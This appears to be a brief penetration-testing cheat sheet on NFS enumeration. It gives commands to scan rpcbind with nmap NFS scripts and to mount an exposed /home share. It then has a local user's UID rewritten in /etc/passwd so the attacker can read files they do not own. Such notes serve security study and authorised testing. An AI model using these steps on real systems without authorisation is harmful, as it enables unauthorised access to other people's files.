NFS Enumeration

NFS is very insecure. Check port 111 for service rpcbind and portmapper

• nmap -p 111 --script nfs* <ip> run all script

• In Output, if showmount is visible check for the directory as it is vuln.
  For ex:- /home directory is being shared and we can access it by mounting it on our Kali virtual machine
  

• mkdir vulnhome

• sudo mount -o nolock <ip>:/home ~/vulnhome/ /home will mount in local vulnhome
  -
  o nolock to disable file locking

• Check mounted directory

• If vuln file is not accessable , check its UUID , create new user and change its uuid

• sudo adduser <username>

• sudo sed -i -e 's/<new user UUID>/<vuln UUID>/g' /etc/passwd

• su <new user>